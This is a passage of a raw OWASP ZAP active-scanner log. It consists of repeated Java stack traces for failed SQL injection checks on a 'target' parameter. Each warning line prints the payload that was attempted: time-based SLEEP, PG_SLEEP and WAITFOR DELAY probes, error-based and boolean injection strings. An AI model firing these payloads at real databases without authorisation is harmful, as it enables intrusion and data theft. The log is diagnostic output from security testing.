org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685450 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND (SELECT * FROM (SELECT(SLEEP(5)))KKxo)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685451 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND (SELECT * FROM (SELECT(SLEEP(5)))OKwp) AND ('znZv'='znZv] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))dhBf) AND 'TamE'='TamE] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685453 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 7453 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7453=7453,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND (SELECT * FROM (SELECT(SLEEP(5)))cUxN) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685455 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8392=8392,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND (SELECT * FROM (SELECT(SLEEP(5)))ZtFp)-- xPTh] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685456 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3791=3791) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685456 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 3577=(SELECT 3577 FROM PG_SLEEP(5)) AND (1750=1750] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685458 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3282=3282) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 5285=(SELECT 5285 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 9202=(SELECT 9202 FROM PG_SLEEP(5)) AND ('NwJH'='NwJH] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 6354=(SELECT 6354 FROM PG_SLEEP(5)) AND 'wHap'='wHap] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685464 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 4591=(SELECT 4591 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685466 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 1511=(SELECT 1511 FROM PG_SLEEP(5))-- HTDO] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (5470=5470] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('UOQJ'='UOQJ] due to an I/O error org.apache.commons.httpclient.URIException: 